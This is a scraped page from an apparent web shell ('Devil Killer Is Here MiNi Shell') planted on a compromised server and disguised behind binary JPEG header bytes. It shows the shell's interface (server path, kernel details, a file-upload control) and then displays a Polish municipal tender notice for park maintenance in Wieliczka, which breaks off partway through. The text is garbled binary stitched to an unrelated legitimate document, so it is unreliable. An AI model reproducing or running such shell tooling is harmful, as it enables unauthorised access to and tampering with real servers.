JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230130/0006803701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Utrzymanie i konserwacja zieleni urządzonej na terenach parkowo – rekreacyjnych Gminy Wieliczka w 2023r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WIELICZKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351555364</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Powstania Warszawskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 263 41 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 278 68 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">magistrat@wieliczka.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wieliczka.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utrzymanie i konserwacja zieleni urządzonej na terenach parkowo – rekreacyjnych Gminy Wieliczka w 2023r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3756f5cd-a07f-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00068037</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00032070/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Utrzymanie zieleni urządzonej na terenach parkowo - rekreacyjnych Gminy Wieliczka w 2023 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wieliczka <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcą odbywa się za pośrednictwem platformazakupowa.pl dostępnej pod adresem: https://platformazakupowa.pl/pn/wieliczka</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a wykonawcą odbywa się za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/wieliczka<br/>2. Złożenie oferty następuje poprzez jej umieszczenie na platformazakupowa.pl, pod adresem: https://platformazakupowa.pl/pn/wieliczka. Po wypełnieniu Formularza składania oferty lub wniosku i dołączenia wszystkich wymaganych załączników należy kliknąć przycisk „Przejdź do podsumowania”. Oferta składana elektronicznie musi zostać podpisana elektronicznym podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym.<br/>3. Wymaga się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje (nie dotyczy oferty), przekazywane były w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>4. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji &#34;Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy na adres e-mail podany w formularzu ofertowym, oraz na adres podany przez Wykonawcę przy składaniu oferty.<br/>5. Ofertę oraz dokumenty i oświadczenia składane wraz z ofertą, jak również wszelkie dokumenty i oświadczenia składane w trakcie postępowania, należy składać w formie elektronicznej (t.j. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>6. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 poz. 2415).<br/>7. Z uwagi na techniczne ograniczenia formularza ogłoszenia (limit znaków) pozostałe informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej zawarto w pkt 6 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Burmistrz Miasta i Gminy Wieliczka z siedzibą w Wieliczce, 32-020 Wieliczka, ul. Powstania Warszawskiego 1;<br/>2. Inspektorem ochrony danych osobowych w Urzędzie Miasta i Gminy w Wieliczce jest Pan Jacek Krzyżaniak – Inspektor Ochrony Danych: iod@wieliczka.eu;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO (przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze) w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 – Prawo zamówień publicznych (tj.: Dz. U. z 2022 r. poz. 1710 ze zm.), dalej „ustawa Pzp”;<br/>5.Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy’<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. Z przyczyn technicznych (ograniczenie pola formularza ogłoszenia) pozostała dalsza klauzuli informacyjnej znajduje się w pkt 31 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.6.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 788859,13 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 232748,63 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest utrzymanie zieleni urządzonej na terenach parkowo – rekreacyjnych Gminy Wieliczka w 2023r.:<br/>Część 1 - Park Adama Mickiewicza, działki nr: 227/3, 119/5 obr. 1 Wieliczka:<br/>a) utrzymanie czystości wraz z usuwaniem ogłoszeń i napisów z miejsc do tego nie przeznaczonych - 60 912 m2; kosze na śmieci - 12 szt.<br/>b) pielęgnacja trawników (koszenie, grabienie) - 54 586 m2<br/>c) pielęgnacja krzewów oraz drzew - 54 586 m2<br/>d) grabienie i wywóz liści - 60 912 m2<br/>e) utrzymanie traktu pieszego, schodów - 6 326 m2<br/>f) odśnieżanie traktu pieszego, schodów - 6 326 m2;<br/>g) odśnieżanie ławek - 21 szt.<br/>2. Wspólny słownik zamówień publicznych CPV:<br/>77313000-7 Usługi utrzymania parków <br/>90610000-6 Usługi sprzątania i zamiatania ulic<br/>77211500-7 Usługi pielęgnacji drzew <br/>77314100-5 Usługi w zakresie trawników<br/>3. Szczegółowy zakres prac oraz wraz z częścią graficzną (mapy) stanowi załącznik nr 5 do SWZ.<br/>4. Wymogi dodatkowe: pilne prace interwencyjne winny być wykonywane niezwłocznie także w godzinach popołudniowych oraz w dniach wolnych od pracy, Wykonawca ponosi wszelką odpowiedzialność za wypadki zaistniałe na terenie przez niego utrzymywanym a wynikające z niedopełnienia obowiązków, wykonawca zabezpiecza teren robót i zapewnia na własny koszt warunki bezpieczeństwa, Wykonawca w przypadku interwencji miejskich służb porządkowych (Policji, Straży Miejskiej) każdorazowo ponosi odpowiedzialność za nienależyte wykonanie zadania.<br/>5. Dodatkowe informacje dotyczące przedmiotu zamówienia:<br/>5.1. Wykonawca w trakcie wykonywania usług ponosi odpowiedzialność (z tytułu prowadzonych robót) za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie prowadzonych prac.<br/>5.2. Zamawiający zobowiązuje Wykonawcę, którego oferta zostanie wybrana jako najkorzystniejsza w niniejszym postępowaniu do posiadania opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia przez cały okres realizacji zamówienia w wysokości minimum 30 000,00 zł (niezależnie od części na którą jego oferta zostanie wybrana).<br/>5.3. Zamawiający na podstawie art. 95 ust. 1 ustawy Pzp wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w zakresie realizacji zamówienia, zgodnie z pkt 21 SWZ.<br/>6. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 23 kwietnia 1964r. Kodeks cywilny (t.j. Dz. U. z 2022 r. poz. 1360 ze zm), ustawie z dnia 11 września 2019r. prawo zamówień publicznych (tj.: Dz.U. z 2022r. poz. 1710 ze zm.), ustawie z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych (tj.: Dz. U. z 2022 r. poz. 1083, 1260, 2687 ze zm.)<br/>7. Jeżeli w SWZ zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 99 ust. 5 ustawy Pzp, zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zagwarantują one prawidłową realizację robót oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach. Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku wykonawca załącza do oferty wykaz rozwiązań równoważnych stosownie wraz z jego opisem lub normami.<br/>8. W przypadku opisania przedmiotu zamówienia w SWZ wraz z załącznikami poprzez odniesienie się do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 uPzp, zamawiający dopuszcza rozwiązania równoważne opisywanym. <br/>8.1. Normy, oceny techniczne, specyfikacje techniczne i systemy referencji technicznych o których mowa w art. 101 ust. 1 pkt 2 uPzp oraz ust. 3 uPzp to:<br/>a) Polskie Normy przenoszące normy europejskie,<br/>b) normy innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących normy europejskie,<br/>c) europejskie oceny techniczne, rozumiane jako udokumentowane oceny działania wyrobu budowlanego względem jego podstawowych cech, zgodnie z odpowiednim europejskim dokumentem oceny, w rozumieniu art. 2 pkt 12 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 305/2011 z dnia 9 marca 2011 r. ustanawiającego zharmonizowane warunki wprowadzania do obrotu wyrobów budowlanych i uchylającego dyrektywę Rady 89/106/EWG (Dz. Urz. UE L 88 z 04.04.2011, str. 5, z późn. zm.),<br/>d) wspólne specyfikacje techniczne, rozumiane jako specyfikacje techniczne w dziedzinie produktów teleinformatycznych określone zgodnie z art. 13 i art. 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1025/2012 z dnia 25 października 2012 r. w sprawie normalizacji europejskiej, zmieniającego dyrektywy Rady 89/686/EWG i 93/15/EWG oraz dyrektywy Parlamentu Europejskiego i Rady 94/9/WE, 94/25/WE, 95/16/WE, 97/23/WE, 98/34/WE, 2004/22/WE, 2007/23/WE, 2009/23/WE i 2009/105/WE oraz uchylającego decyzję Rady 87/95/EWG i decyzję Parlamentu Europejskiego i Rady nr 1673/2006/WE (Dz. Urz. UE L 316 z 14.11.2012, str. 12 z późn. zm.),<br/>e) normy międzynarodowe,<br/>f) specyfikacje techniczne, których przestrzeganie nie jest obowiązkowe, przyjętych przez instytucję normalizacyjną, wyspecjalizowaną w opracowywaniu specyfikacji technicznych w celu powtarzalnego i stałego stosowania,<br/>g) inne systemy referencji technicznych ustanowionych przez europejskie organizacje normalizacyjne,<br/>8.2. Przez normę należy rozumieć specyfikację techniczną przyjętą przez krajową, europejską lub międzynarodową instytucję normalizacyjną w celu powtarzalnego i stałego stosowania, której przestrzeganie nie jest obowiązkowe, w tym Polską Normę, normę europejską lub normę międzynarodową.<br/>8.3. W przypadku braku Polskich Norm przenoszących normy europejskie, norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących normy europejskie oraz norm, europejskich ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust.1 pkt 2 uPzp, przy opisie przedmiotu zamówienia uwzględnia się w kolejności:<br/>a) Polskie Normy,<br/>b) krajowe oceny techniczne wydawane na podstawie ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz.U. z 2021 r. poz. 1213),<br/>c) polskie specyfikacje techniczne dotyczące projektowania, wyliczeń i realizacji robót budowlanych oraz wykorzystania dostaw,<br/>d) krajowe deklaracje zgodności oraz krajowe deklaracje właściwości użytkowych wyrobu budowlanego.<br/>8.4. Przepis art. 101 ust. 5 i 6 uPzp stosuje się. <br/>9. Zamawiający informuje, że dopuszcza się możliwość przeprowadzenia wizji lokalnej, przy czym możliwe jest złożenie oferty bez jej przeprowadzenia. Zamawiający nie przewiduje odrzucenia oferty Wykonawcy, który nie odbył wizji lokalnej w ramach przedmiotowego postępowania. W celu umówienia wizji lokalnej na terenie inwestycji Wykonawca zobowiązany jest skontaktować się z osobami wyznaczonymi do komunikowania się z wykonawcami. Zamawiający informuje, że w trakcie wizji lokalnej nie będą udzielane żadne odpowiedzi na pytania oraz nie będą sporządzane protokoły z tych wizji. Wszelkie niezbędne dokumenty są zamieszczone na stronie prowadzonego postępowania i w związku z tym Zamawiający nie przewiduje możliwości ani nie stawia wymogu sprawdzenia przez wykonawcę dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 93684,45 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77313000-7 - Usługi utrzymania parków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90610000-6 - Usługi sprzątania i zamiatania ulic</p> <p class="mb-0">77211500-7 - Usługi pielęgnacji drzew</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które odpowiadają wymaganiom opisanym w niniejszej SWZ. Wybór najkorzystniejszej oferty nastąpi na podstawie wyznaczonych przez Zamawiającego kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby sprawującej nadzór</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest utrzymanie zieleni urządzonej na terenach parkowo – rekreacyjnych Gminy Wieliczka w 2023r.:<br/>Część 2 - Stok pod Baranem, działki nr: 1246/17,1246/18, 1246/4, 1247 obr. 1 Wieliczka.<br/>a) utrzymanie czystości wraz z usuwaniem ogłoszeń i napisów z miejsc do tego nie przeznaczonych - <br/> 128 668 m2; kosze na śmieci - 52 szt.; kosz na psie odchody - 1 szt.;<br/>b) pielęgnacja nasadzeń - 6 949 m2 (krzewów: 4 363 m2, bylin: 1 916 m2, traw ozdobnych: 142 m2, żywopłotów: 528 m2 ), drzew - 161 szt.<br/>c) pielęgnacja trawników (koszenie, grabienie, wywóz) - 8 730 m2 ;<br/>d) pielęgnacja boiska trawiastego, psiego wybiegu (koszenie, grabienie, wywóz) – 1400 m2 + 550 m2<br/>e) grabienie i wywóz liści - 1 950 m2;<br/>f) utrzymanie ciągów pieszych o różnych nawierzchniach - 7 761m2;<br/>g) utrzymanie platformy widokowej – 100 m2;<br/>h) utrzymanie miejsc postojowych – 620 m2;<br/>i) utrzymanie koryt odwadniających -120 mb;<br/>j) utrzymanie przepustów – 18 szt.;<br/>k) odśnieżanie miejsc postojowych – 620 m2;<br/>2. Wspólny słownik zamówień publicznych CPV:<br/>77313000-7 Usługi utrzymania parków <br/>90610000-6 Usługi sprzątania i zamiatania 